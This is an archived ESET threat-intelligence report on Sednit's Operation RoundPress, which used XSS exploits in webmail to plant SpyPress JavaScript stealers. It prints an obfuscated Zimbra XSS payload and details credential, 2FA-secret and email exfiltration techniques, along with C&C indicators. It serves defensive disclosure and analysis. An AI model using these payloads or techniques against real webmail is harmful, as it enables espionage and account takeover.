{ "id": "354b1ddd-2768-4d24-a2bc-304587d349cc", "created_at": "2026-04-06T00:10:33.803012Z", "updated_at": "2026-04-10T03:37:49.887403Z", "deleted_at": null, "sha1_hash": "e2c747a4021a1d5fcf088e14331c633969283fd9", "title": "Operation RoundPress targeting high-value webmail servers", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2824118, "plain_text": "Operation RoundPress targeting high-value webmail servers\r\nBy Matthieu Faou\r\nArchived: 2026-04-05 16:51:53 UTC\r\nThis blogpost introduces an operation that we named RoundPress, targeting high-value webmail servers with XSS\r\nvulnerabilities, and that we assess with medium confidence is run by the Sednit cyberespionage group. The\r\nultimate goal of this operation is to steal confidential data from specific email accounts.\r\nKey points of this blogpost:\r\nIn Operation RoundPress, the compromise vector is a spearphishing email leveraging an XSS\r\nvulnerability to inject malicious JavaScript code into the victim’s webmail page.\r\nIn 2023, Operation RoundPress only targeted Roundcube, but in 2024 it expanded to other\r\nwebmail software including Horde, MDaemon, and Zimbra.\r\nFor MDaemon, Sednit used a zero-day XSS vulnerability. We reported the vulnerability to the\r\ndevelopers on November 1st, 2024 and it was patched in version 24.5.1.\r\nMost victims are governmental entities and defense companies in Eastern Europe, although we\r\nhave observed governments in Africa, Europe, and South America being targeted as well.\r\nWe provide an analysis of the JavaScript payloads SpyPress.HORDE, SpyPress.MDAEMON,\r\nSpyPress.ROUNDCUBE, and SpyPress.ZIMBRA.\r\nThese payloads are able to steal webmail credentials, and exfiltrate contacts and email messages\r\nfrom the victim’s mailbox.\r\nAdditionally, SpyPress.MDAEMON is able to set up a bypass for two-factor authentication.\r\nSednit profile\r\nThe Sednit group – also known as APT28, Fancy Bear, Forest Blizzard, or Sofacy – has been operating since at\r\nleast 2004. The US Department of Justice named the group as one of those responsible for the Democratic\r\nNational Committee (DNC) hack just before the 2016 US elections and linked the group to the GRU. The group is\r\nalso presumed to be behind the hacking of global television network TV5Monde, the World Anti-Doping Agency\r\n(WADA) email leak, and many other incidents. Sednit has a diversified set of malware tools in its arsenal, several\r\nexamples of which we have documented previously in our Sednit white paper from 2016.\r\nLinks to Sednit\r\nOn September 29th, 2023, we detected a spearphishing email, part of Operation RoundPress, sent from\r\nkatecohen1984@portugalmail[.]pt (envelope-from address). The email exploited CVE‑2023‑43770 in Roundcube.\r\nThis email address is very similar to the ones used in other Sednit campaigns in 2023, as documented by Unit42\r\nfor example.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 1 of 28\n\nLeveraging a network scan we ran in February 2022, we found the server 45.138.87[.]250 / ceriossl[.]info, which\r\nwas configured in the same unique way as 77.243.181[.]238 / global-world-news[.]net. The former was mentioned\r\nin a Qianxin blogpost describing a campaign abusing CVE-2023-23397 that attributed it to Sednit. The latter is a\r\ndomain used in Operation RoundPress in 2023.\r\nGiven these two elements, we believe with medium confidence that Operation RoundPress is carried out by\r\nSednit.\r\nVictimology\r\nTable 1 and Figure 1 detail targets of Operation RoundPress in 2024, from ESET telemetry and two samples on\r\nVirusTotal.\r\nMost of the targets are related to the current war in Ukraine; they are either Ukrainian governmental entities or\r\ndefense companies in Bulgaria and Romania. Notably, some of these defense companies are producing Soviet-era\r\nweapons to be sent to Ukraine.\r\nOther targets include African, EU, and South American governments.\r\nTable 1. Operation RoundPress victims in 2024\r\nDate Country Sector\r\n2024-\r\n05\r\nGreece National government.\r\nRomania Unknown (VirusTotal submission).\r\nUkraine\r\nSpecialized Prosecutor’s Office in the Field of Defense of the Western Region\r\n(VirusTotal submission).\r\n2024-\r\n06\r\nBulgaria Telecommunications for the defense sector.\r\nCameroon National government.\r\nUkraine Military.\r\n2024-\r\n07\r\nEcuador Military.\r\nUkraine Regional government.\r\nSerbia National government.\r\n2024-\r\n09\r\nCyprus An academic in environmental studies.\r\nRomania Defense company.\r\nUkraine Military.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 2 of 28\n\nDate Country Sector\r\n2024-\r\n10\r\nBulgaria Defense company.\r\n2024-\r\n11\r\nBulgaria Defense company (not the same as in 2024-10).\r\nUkraine\r\nCivil air transport company.\r\nDefense company.\r\n2024-\r\n12\r\nUkraine State company in the transportation sector.\r\nFigure 1. Map of operation RoundPress victims in 2024\r\nCompromise chain\r\nInitial access\r\nIn 2023, Sednit was exploiting CVE-2020-35730, a known XSS vulnerability in Roundcube (see this CERT-UA\r\nblogpost and this Recorded Future report), which enables the loading of arbitrary JavaScript code in the context of\r\nthe webmail window.\r\nIn 2024, we observed different XSS vulnerabilities being used to target additional webmail software: Horde,\r\nMDaemon, and Zimbra. Sednit also started to use a more recent vulnerability in Roundcube, CVE-2023-43770.\r\nThe MDaemon vulnerability (CVE-2024-11182, now patched) was a zero day, most likely discovered by Sednit,\r\nwhile the ones for Horde, Roundcube, and Zimbra were already known and patched.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 3 of 28\n\nSednit sends these XSS exploits by email. The exploits lead to the execution of malicious JavaScript code in the\r\ncontext of the webmail client web page running in a browser window. Therefore, only data accessible from the\r\nvictim’s account can be read and exfiltrated.\r\nNote that, in order for the exploit to work, the target must be convinced to open the email message in the\r\nvulnerable webmail portal. This means that the email needs to bypass any spam filtering and the subject line needs\r\nto be convincing enough to entice the target into reading the email message.\r\nFigure 2 summarizes the compromise chain used in Operation RoundPress.\r\nFigure 2. Operation RoundPress compromise chain\r\nGenerally, the email message looks benign and contains text about news events. For example, on September 11\r\nth\r\n,\r\n2024, a Ukrainian target received a phishing email from kyivinfo24@ukr[.]net with the subject СБУ схопила\r\nбанкіра, який працював на ворожу воєнну розвідку в Харкові (machine translation: SBU arrested a banker\r\nwho worked for enemy military intelligence in Kharkiv). The message body – see Figure 3 – contains excerpts (in\r\nUkrainian) and links to articles from Kyiv Post, a well-known newspaper in Ukraine. The malicious code that\r\ntriggers the XSS vulnerability is inside the HTML code of the email message’s body and is not directly visible to\r\nthe user.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 4 of 28\n\nFigure 3. Malicious email message sent by Sednit\r\nAnother example is an email from office@terembg[.]com to a Bulgarian target on November 8th, 2024, with the\r\nsubject Путин се стреми Тръмп да приеме руските условия вдвустранните отношения (machine translation:\r\nPutin seeks Trump’s acceptance of Russian conditions in bilateral relations). The message body – see Figure 4 –\r\nagain contains excerpts (in Bulgarian) and links to articles from News.bg, a legitimate Bulgarian newspaper.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 5 of 28\n\nFigure 4. Another malicious email sent by Sednit\r\nNote that some of these vulnerabilities are not of interest exclusively to this group: GreenCube (also known as\r\nUNC3707) and Winter Vivern have been exploiting them as well.\r\nHorde: Unknown exploit\r\nFor targets using Horde webmail, we have seen Sednit using an old vulnerability. We were unable to find the exact\r\nvulnerability, but it appears to be an XSS flaw that was already fixed in the first version of Xss.php committed to\r\nGitHub, and in Horde Webmail 1.0, which was released in 2007.\r\nThe intended exploit used by Sednit is shown in Figure 5. Placing malicious JavaScript code in the onerror\r\nattribute of an img element is a technique taken straight from the XSS playbook: because the src attribute is x, an\r\nundefined value, onerror is called and the payload is base64 decoded and then evaluated using\r\nwindow.parent.eval.\r\nFigure 5. Horde webmail exploit\r\nIn Horde Webmail version 1.0, the XSS filter removes the style elements and the on* attributes, such as onerror.\r\nThus, we believe that Sednit made a mistake and tried to use a nonworking exploit.\r\nMDaemon: CVE-2024-11182\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 6 of 28\n\nOn November 1st\r\n, 2024, we detected an email message sent to two Ukrainian state-owned defense companies and\r\na Ukrainian civil air transport company.\r\nThis message exploited a zero-day XSS vulnerability in MDaemon Email Server, in the rendering of untrusted\r\nHTML code in email messages. We reported the vulnerability to the developers on November 1st, 2024 and it was\r\npatched in version 24.5.1, which was released on November 14th, 2024; we then issued CVE-2024-11182 for it.\r\nThe exploit used by Sednit is shown in Figure 6. Just as for Horde, it relies on a specially crafted img element, but\r\nuses a bug in the MDaemon HTML parser where a noembed end tag inserted within the title attribute of a p\r\nelement tricks the parser into rendering the immediately succeeding img tag.\r\nFigure 6. Exploit for CVE-2024-11182 in MDaemon\r\nRoundcube: CVE-2023-43770\r\nFor targets using Roundcube webmail: in 2023, Sednit used the XSS vulnerability CVE‑2020‑35730, while in\r\n2024, it switched to CVE-2023-43770.\r\nThe more recent vulnerability was patched on September 14th, 2023 in this GitHub commit. The fix is in a regex\r\nin the rcube_string_replacer.php script. The exploit used by Sednit is quite simple and is depicted in Figure 7.\r\nFigure 7. Exploit for CVE-2023-43770 in Roundcube\r\nIn rcube_string_replacer.php, URLs are converted to hyperlinks, and the hyperlink text is what is expected to be\r\nprovided between the outer set of square brackets. The bug lies in the fact that the hyperlink text is not properly\r\nsanitized, allowing the characters \u003c and \u003e. This enables an attacker to provide JavaScript code contained between\r\n\u003cscript\u003e and \u003c/script\u003e, which is directly added to the page when the email is rendered in Roundcube.\r\nZimbra: CVE-2024-27443 / ZBUG-3730\r\nFor Zimbra, Sednit uses CVE-2024-27443 (also tracked as ZBUG-3730). It was patched on March 1st, 2024 in\r\nthis GitHub commit, in the ZmInviteMsgView.js file. The vulnerability lies in failing to sanitize the cif (calendar\r\nintended for) attribute, in a calendar invitation sent by email.\r\nThe cif attribute is populated from the email header X-Zimbra-Calendar-Intended-For. Before the patch, the value\r\nwas directly added to the Zimbra HTML page without sanitization. This allowed the execution of malicious\r\nJavaScript code in the context of the webmail browser window.\r\nThe exploit code that we found in this header is the following:\r\nZimbra Calendar\u003cimg/alt=''/src='Zimbra-Calendar'/onerror=\\\"window[(function(tmz)\r\n{ghwa='cxe';return '\\\\x65'+decodeURI('%76')+'\\\\x61\\\\x6c'})()](window[(function(jvqka){const\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 7 of 28\n\nkqd=decodeURI('%61')+'\\t'+decodeURI('%6F')+'\\\\x62'; oykbg='doix'; return kqd})()]\r\n(frames[0].document.getElementById('a-cashed-skinLayout2')['\\inn\\e\\r\\T\\e\\xt']))\\\"\u003e\r\nThe beautified code contained in the onerror attribute is:\r\nwindow['eval'](window[(function(jvqka){'atob'()](frames[0].document.getElementById('a-cashed-skinLayout2')['innerText']))\r\nBasically, this reads the text contained in a div element, identified by ID a-cashed-skinLayout2, that is present in\r\nthe body of the calendar invite. This div element uses the style attribute with the value display:none so that it is\r\nnot visible to the target. The inner text contains base64-encoded JavaScript code that is run using eval.\r\nPersistence\r\nThe JavaScript payloads (SpyPress) loaded by the XSS vulnerabilities don’t have true persistence, but they are\r\nreloaded every time the victim opens the malicious email.\r\nIn addition, we detected a few SpyPress.ROUNDCUBE payloads that have the ability to create Sieve rules.\r\nSpyPress.ROUNDCUBE creates a rule that will send a copy of every incoming email to an attacker-controlled\r\nemail address. Sieve rules are a feature of Roundcube and therefore the rule will be executed even if the malicious\r\nscript is no longer running.\r\nCredential access\r\nAll SpyPress payloads have the ability to steal webmail credentials by trying to trick the browser or password\r\nmanager to fill webmail credentials into a hidden form. In addition, some samples also try to trick the victim by\r\nlogging them out of their webmail account and displaying a fake login page.\r\nCollection and exfiltration\r\nMost SpyPress payloads collect email messages and contact information from the victim’s mailbox. The data is\r\nthen exfiltrated via an HTTP POST request to a hardcoded C\u0026C server.\r\nIn 2024, we have observed Sednit using four payloads in Operation RoundPress: SpyPress.HORDE,\r\nSpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA. They are injected into the victims’\r\nwebmail context using XSS vulnerabilities, as explained above.\r\nThe four payloads have common characteristics. All are similarly obfuscated, with variable and function names\r\nreplaced with random-looking strings – see Figure 8. Furthermore, strings used by the code, such as webmail and\r\nC\u0026C server URLs, are also obfuscated and contained in an encrypted list. Each of those strings is only decrypted\r\nwhen it is used. Note that the variable and function names are randomized for each sample, so the final SpyPress\r\npayloads will have different hashes.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 8 of 28\n\nFigure 8. Obfuscation of the JavaScript code\r\nAnother common characteristic is that there are no persistence or update mechanisms. The payload is fully\r\ncontained in the email and only executed when the email message is viewed from a vulnerable webmail instance.\r\nFinally, all payloads communicate with their hardcoded C\u0026C servers via HTTP POST requests. There is a small\r\nnumber of C\u0026C servers that are shared by all payloads (there is no separation by victim or payload type).\r\nSpyPress.HORDE\r\nSpyPress.HORDE is the JavaScript payload injected into vulnerable Horde webmail instances. Once\r\ndeobfuscated, and functions and variables are manually renamed, it reveals its main functionality: collecting and\r\nexfiltrating user credentials.\r\nCapabilities\r\nTo steal credentials, as shown in Figure 9, SpyPress.HORDE creates two HTML input elements: horde_user and\r\nhorde_pass. Their width and opacity are set to 0%, ensuring that they are not visible to the user. The goal is to\r\ntrick browsers and password managers into filling those values. Note that a callback for the change event is\r\ncreated on the input horde_pass. This calls the function input_password_on_change as soon as the input element\r\nloses focus after its value is changed.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 9 of 28\n\nFigure 9. SpyPress.HORDE credential stealer\r\nThen, input_password_on_change exfiltrates the data by calling C2_POST_Request, as can be seen in Figure 10.\r\nNetwork protocol\r\nThe C\u0026C URL is hardcoded in the script (see Figure 10) and the exfiltration is done via an HTTPS POST request.\r\nThe body data has a specific format that is sent base64 encoded. For example,\r\nbWVAdmljdGltLm9yZyA6OiBweAoKbXl1c2VybmFtZSBteXBhc3N3b3Jk decodes to:\r\nme@victim.org :: px\r\nmyusername mypassword\r\nwhere px probably means password exfiltration.\r\nNote that the HTTP request is made by the victim’s browser, so HTTP headers such as the User-Agent will vary\r\nfrom victim to victim.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 10 of 28\n\nFigure 10. SpyPress.HORDE data exfiltration\r\nSpyPress.MDAEMON\r\nSpyPress.MDAEMON is a JavaScript payload injected into vulnerable MDaemon webmail instances. Once\r\ndeobfuscated, it reveals more functionality than what was implemented in SpyPress.HORDE:\r\ncredential stealing (very similar to the SpyPress.HORDE implementation),\r\nexfiltration of contacts and login history,\r\nexfiltration of email messages,\r\nexfiltration of the two-factor authentication secret, and\r\ncreation of an App Password, which enables attackers to access the mailbox from a mail application and to\r\nbypass 2FA protection.\r\nCapabilities\r\nCredential stealer\r\nThe credential stealer of SpyPress.MDAEMON is almost identical to that of SpyPress.HORDE – see Figure 11.\r\nThe only difference is the name of the input fields, which are User and Password, to match the official names used\r\nin the MDaemon software.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 11 of 28\n\nFigure 11. SpyPress.MDAEMON credential stealer\r\nContacts and login history\r\nSpyPress.MDAEMON obtains the victim’s login history from https://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\r\n\u003csession_ID\u003e\u0026View=Options-Authentication\u0026GetLoginHistory=Yes, and exfiltrates the content to the hardcoded\r\nC\u0026C server. It uses the same function used in the credential stealer part to send an HTTP POST request to the\r\nC\u0026C server, but instead of px, it uses ab as the message type.\r\nThen, as shown in Figure 12, the script obtains the victim’s contact list from\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=Contacts. This list, and the associated\r\nemail addresses (in the eml JavaScript property), are then exfiltrated to the C\u0026C server.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 12 of 28\n\nFigure 12. Exfiltration of login history and contacts\r\nEmail message exfiltration\r\nSpyPress.MDAEMON browses the victim’s mailbox folders, as shown in Figure 13, and filters out a hardcoded\r\nlist of folders the attackers are not interested in: calendar, notes, documents, contacts, tasks, allowed senders, and\r\nblocked senders.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 13 of 28\n\nFigure 13. SpyPress.MDAEMON browses the victim’s mailbox folders\r\nThen, for each folder, as shown in Figure 14, SpyPress.MDAEMON iterates over the pages and then over all\r\nmessages in each page, before exfiltrating each email to the C\u0026C server.\r\nTo get a list of email messages in a given folder page, SpyPress.MDAEMON fetches\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=List\u0026ReturnJavaScript=1\u0026FolderID=\r\n\u003cfolder_ID\u003e\u0026Sort=RevDate\u0026Page=\u003cpage\u003e\u0026UTF8=1.\r\nThen, it iterates over this list and fetches https://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026\r\nView=Message\u0026Source=Yes\u0026Number=\u003cemail_ID\u003e\u0026FolderId=\u003cfolder_ID\u003e to get the source of each email.\r\nFinally, the email source is exfiltrated via an HTTP POST request to the C\u0026C server, using the message type mail-\r\n\u003cfolder_name\u003e-\u003cemail_ID\u003e. An HTTP POST request is made for each exfiltrated email, and thus it will create a\r\nlarge amount of network traffic.\r\nNote that the script maintains a list of exfiltrated emails, thereby avoiding the exfiltration several times.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 14 of 28\n\nFigure 14. SpyPress.MDAEMON exfiltrates all emails\r\nAlso note that the obfuscator seems to have introduced errors in the script. In the function\r\ndownload_all_messages_from_folder, is_folder_limit is a real variable name that was left unobfuscated. However,\r\nit is not used anywhere in the code.\r\nTwo-factor authentication secret\r\nSpyPress.MDAEMON exfiltrates the victim’s two-factor authentication secret – see Figure 15. It first fetches\r\nhttps://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\u003csession_ID\u003e\u0026View=Options-https://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 15 of 28\n\nAuthentication\u0026TwoFactorAuth=Yes\u0026GetSecret=Yes to get the secret, and then sends it to the C\u0026C server, using\r\nthe message type 2fa.\r\nTo view the secret, the password is required, which SpyPress.MDAEMON gets from the fake login form it\r\ncreated. This secret is equivalent to the QR code mentioned in MDaemon documentation and it can be used to\r\nregister the account in an authentication app, to then generate a valid 2FA code for the victim’s account. Because\r\nSpyPress.MDAEMON acquires the password and the 2FA secret, attackers will be able to log into the account\r\ndirectly.\r\nFigure 15. SpyPress.MDAEMON exfiltrates the 2FA secret\r\nApp Password creation\r\nIn addition to stealing the 2FA secret, SpyPress.MDAEMON creates an App Password (see the documentation).\r\nThis password can be used in an email client to send and receive messages, without having to enter the 2FA code,\r\neven if 2FA is activated for the account. Note that MDaemon webmail doesn’t seem to require a 2FA code to\r\ngenerate a new application password.\r\nAs shown in Figure 16, SpyPress.MDAEMON fetches https://\u003cwebmail_URL\u003e/WorldClient.dll?Session=\r\n\u003csession_ID\u003e\u0026View=Options-Authentication\u0026CreateAppPassword=1s to create a new application password. The\r\nreply is this password, which is exfiltrated to the C\u0026C server with the message type create-app.\r\nIn other words, this application password enables attackers to add the email account directly to their own email\r\nclient. They can thereby keep access to the mailbox even if the main password of the victim’s account is changed\r\nor if the 2FA code is changed.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 16 of 28\n\nFigure 16. SpyPress.MDAEMON creates an application password\r\nNetwork protocol\r\nSpyPress.MDAEMON uses the same network protocol as SpyPress.HORDE.\r\nSpyPress.ROUNDCUBE\r\nSpyPress.ROUNDCUBE is the JavaScript payload injected into vulnerable Roundcube webmail instances. Once\r\ndeobfuscated, it reveals similar functionalities to what is implemented in SpyPress.MDAEMON:\r\ncredential stealing,\r\nexfiltration of the address book and the about page,\r\nexfiltration of emails, and\r\nmalicious Sieve rules.\r\nCapabilities\r\nCredential stealer\r\nThe credential stealer of SpyPress.ROUNDCUBE has two features. The first one is almost identical to the\r\ncredential stealer of SpyPress.HORDE and SpyPress.MDAEMON. The only difference is the name of the input\r\nfields, which are _user and _pass, to match the official names used in the Roundcube software.\r\nThe second feature is slightly more intrusive. SpyPress.ROUNDCUBE creates an iframe, as shown in Figure 17,\r\nwith the src attribute set to https://\u003cwebmail_URL\u003e/?_task=logout\u0026_token=\u003cCSRF_token\u003e. This logs the victim\r\nout, forcing them to reenter their credentials. SpyPress.ROUNDCUBE adds a callback on the submit button of the\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 17 of 28\n\ngenuine login form. Finally, the credentials are exfiltrated to the hardcoded C\u0026C server using the message type\r\npax-fish.\r\nFigure 17. SpyPress.ROUNDCUBE creates an iframe to log out the victim\r\nNote that the CSRF token is retrieved from the variable rcmail.env.request_token. The rcmail global variable is\r\nmanaged and filled by the Roundcube instance, and accessible in the JavaScript context that\r\nSpyPress.ROUNDCUBE is running in.\r\nExfiltration of the address book and the about page\r\nSpyPress.ROUNDCUBE fetches the address book at\r\nhttps://\u003cwebmail_URL\u003e/?_task=addressbook\u0026_source=0\u0026_action=export\u0026\u0026_token=\u003cCSRF_token\u003e and sends\r\nthe raw output to the C\u0026C server.\r\nSimilarly, SpyPress.ROUNDCUBE fetches the about page at https://\u003cwebmail_URL\u003e/?\r\n_task=settings\u0026_framed=1\u0026_action=about and sends the raw output to the C\u0026C server.\r\nThat page contains information about the Roundcube version and the plugins installed, as shown in Figure 18.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 18 of 28\n\nFigure 18. Example of Roundcube about page\r\nEmail message exfiltration\r\nSpyPress.ROUNDCUBE starts the email exfiltration routine every 7,200 seconds (two hours).\r\nFirst, it gets the list of mailboxes from the global variable rcmail.env.mailboxes. Then, it iterates over all those\r\nmailboxes; for each of them, it iterates over the pages to get the email message IDs by fetching\r\nhttps://\u003cwebmail_URL\u003e/?_task=mail\u0026_action=list\u0026_mbox=\u003cmailbox_name\u003e\u0026_refresh=1\u0026_remote=1\u0026_page=\r\n\u003ccurrent_page\u003e. Note that SpyPress.ROUNDCUBE adds the HTTP header X-Roundcube-Request, which\r\ncontains the CSRF token.\r\nAlso note that there is a lower bound time hardcoded in the script, 6:02:03 am, October 1st, 2024 in the specific\r\nscript sample we analyzed, and only emails more recent than this are exfiltrated.\r\nThe source of each email message is fetched from\r\nhttps://\u003cwebmail_URL\u003e/?_task=mail\u0026_mbox=\u003cmailbox\u003e\u0026_uid=\u003cemail_ID\u003e\u0026_action=viewsource and then\r\nexfiltrated to the C\u0026C server.\r\nNote that if SpyPress.ROUNDCUBE has exfiltrated more than 150 emails in a row, it stops the exfiltration until\r\nthe next execution of the email exfiltration routine (two hours later). This is probably done to limit the noise on\r\nthe victim’s network and avoid detection.\r\nMalicious Sieve rules\r\nIn some SpyPress.ROUNDCUBE samples, there is additional functionality related to Sieve rules – see Figure 19.\r\nSpyPress.ROUNDCUBE creates a rule that sends a copy of every incoming email message to an attacker-https://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 19 of 28\n\ncontrolled email address (srezoska@skiff[.]com in this case). Skiff was a privacy-oriented email service that\r\nprovided end-to-end encryption.\r\nFigure 19. SpyPress.ROUNDCUBE creates a malicious Sieve rule\r\nNetwork protocol\r\nSpyPress.ROUNDCUBE uses the same network protocol as SpyPress.HORDE.\r\nSpyPress.ZIMBRA\r\nSpyPress.ZIMBRA is the JavaScript payload injected into vulnerable Zimbra webmail instances. Once\r\ndeobfuscated, it reveals similar functionalities to the previous payloads:\r\ncredential stealing,\r\nexfiltration of contacts and settings, and\r\nexfiltration of email messages.\r\nCapabilities\r\nCredential stealer\r\nThe credential stealer of SpyPress.ZIMBRA is almost identical to those of SpyPress.HORDE and\r\nSpyPress.MDAEMON. The only difference is the name of the input fields, which are username and password, to\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 20 of 28\n\nmatch the official names used in the Zimbra software.\r\nExfiltration of contacts and settings\r\nSpyPress.ZIMBRA fetches the victim’s contact list by making a SOAP request to the Zimbra API endpoint\r\nhttps://\u003cwebmail_URL\u003e/service/soap/SearchRequest. As shown in Figure 20, the search query is contained in a\r\ndictionary that it is sent to the Zimbra server in the body of a POST request. Finally, SpyPress.ZIMBRA exfiltrates\r\nthe raw output to the C\u0026C server.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 21 of 28\n\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 22 of 28\n\nFigure 20. SpyPress.ZIMBRA gets the victim’s contact list\r\nSpyPress.ZIMBRA also exfiltrates to the C\u0026C server the content of the global variable ZmSetting, which contains\r\nvarious configuration and preference values. This is similar to SpyPress.ROUNDCUBE, which exfiltrates the\r\nabout page.\r\nEmail exfiltration\r\nEvery 14,400 seconds (four hours), using the setInterval function, this payload starts its email exfiltration routine.\r\nAs for the previous payloads, SpyPress.ZIMBRA first lists the folders, then iterates over the first 80 emails in each\r\nfolder via a SOAP request to https://\u003cwebmail_URL\u003e/service/soap/SearchRequest. For each message, the script\r\nfetches the source at https://\u003cwebmail_URL\u003e/service/home/~/?auth=co\u0026view=text\u0026id=\u003cemail_ID\u003e and then\r\nexfiltrates the email message source – see Figure 21.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 23 of 28\n\nFigure 21.SpyPress.ZIMBRA exfiltrates email messages\r\nNetwork protocol\r\nSpyPress.ZIMBRA uses the same network protocol as SpyPress.HORDE.\r\nConclusion\r\nOver the past two years, webmail servers such as Roundcube and Zimbra have been a major target for several\r\nespionage groups such as Sednit, GreenCube, and Winter Vivern. Because many organizations don’t keep their\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 24 of 28\n\nwebmail servers up to date and because the vulnerabilities can be triggered remotely by sending an email message,\r\nit is very convenient for attackers to target such servers for email theft.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 Filename Detection Description\r\n41FE2EFB38E0C7DD10E6\r\n009A68BD26687D6DBF4C\r\nN/A JS/Agent.RSO SpyPress.ZIMBRA.\r\n60D592765B0F4E08078D\r\n42B2F3DE4F5767F88773\r\nN/A JS/Exploit.Agent.NSH\r\nXSS exploit for CVE-2023-\r\n43770.\r\n1078C587FE2B246D618A\r\nF74D157F941078477579\r\nN/A JS/Exploit.Agent.NSH SpyPress.ROUNDCUBE.\r\n8EBBBC9EB54E216EFFB4\r\n37A28B9F2C7C9DA3A0FA\r\nN/A HTML/Phishing.Agent.GNZ\r\nXSS exploit for CVE-2024-\r\n11182.\r\nF95F26F1C097D4CA3830\r\n4ECC692DBAC7424A5E8D\r\nN/A HTML/Phishing.Agent.GNZ SpyPress.MDAEMON.\r\n2664593E2F5DCFDA9AAA\r\n1A2DF7C4CE7EEB1EDBB6\r\nN/A JS/Agent.SJU\r\nProbable XSS exploit for\r\nHorde.\r\nB6C340549700470C6510\r\n31865C2772D3A4C81310\r\nN/A JS/Agent.SJU SpyPress.HORDE.\r\n65A8D221B9ECED76B9C1\r\n7A3E1992DF9B085CECD7\r\nN/A HTML/Phishing.Gen SpyPress.ROUNDCUBE.\r\n6EF845938F064DE39F4B\r\nF6450119A0CDBB61378C\r\nN/A N/A\r\nEmail exploiting CVE-2023-43770, found on\r\nVirusTotal.\r\n8E6C07F38EF920B5154F\r\nD081BA252B9295E8184D\r\nN/A JS/Agent.RSP SpyPress.ROUNDCUBE.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 25 of 28\n\nSHA-1 Filename Detection Description\r\nAD3C590D1C0963D62702\r\n445E8108DB025EEBEC70\r\nN/A JS/Agent.RSN SpyPress.ZIMBRA.\r\nEBF794E421BE60C95320\r\n91EB432C1977517D1BE5\r\nN/A JS/Agent.RTD SpyPress.ROUNDCUBE.\r\nF81DE9584F0BF3E55C6C\r\nF1B465F00B2671DAA230\r\nN/A JS/Agent.RWO SpyPress.ROUNDCUBE.\r\nA5948E1E45D50A8DB063\r\nD7DFA5B6F6E249F61652\r\nN/A JS/Exploit.Agent.NSG\r\nXSS exploit for CVE-2023-\r\n43770.\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n185.225.69[.]223 sqj[.]fr 23VNet Kft. 2024‑06‑01 SpyPress C\u0026C server.\r\n193.29.104[.]152\r\ntgh24[.]xyz\r\ntuo[.]world\r\nGLOBALAXS NOC PARIS 2024‑06‑04 SpyPress C\u0026C server.\r\n45.137.222[.]24 lsjb[.]digital Belcloud Administration 2024‑07‑03 SpyPress C\u0026C server.\r\n91.237.124[.]164 jiaw[.]shop HOSTGNOME LTD 2023‑09‑28 SpyPress C\u0026C server.\r\n185.195.237[.]106 hfuu[.]de Network engineer 2024‑06‑03 SpyPress C\u0026C server.\r\n91.237.124[.]153 raxia[.]top Damien Cutler 2024‑06‑03 SpyPress C\u0026C server.\r\n146.70.125[.]79 rnl[.]world GLOBALAXS NOC PARIS 2024‑06‑07 SpyPress C\u0026C server.\r\n89.44.9[.]74 hijx[.]xyz M247 Europe SRL 2024‑07‑05 SpyPress C\u0026C server.\r\n111.90.151[.]167 ikses[.]net Shinjiru Technology Sdn Bhd 2024‑12‑01 SpyPress C\u0026C server.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource\r\nDevelopment T1583.001\r\nAcquire\r\nInfrastructure:\r\nDomains\r\nSednit bought domains at various registrars.\r\nhttps://www.welivesecurity.com/en/eset-research/operation-roundpress/\r\nPage 26 of 28\n\nTactic ID Name Description\r\nT1583.004\r\nAcquire\r\nInfrastructure: Server\r\nSednit rented servers at M247 and other hosting\r\nproviders.\r\nT1587.004\r\nDevelop Capabilities:\r\nExploits\r\nSednit developed (or acquired) XSS exploits for\r\nRoundcube, Zimbra, Horde, and 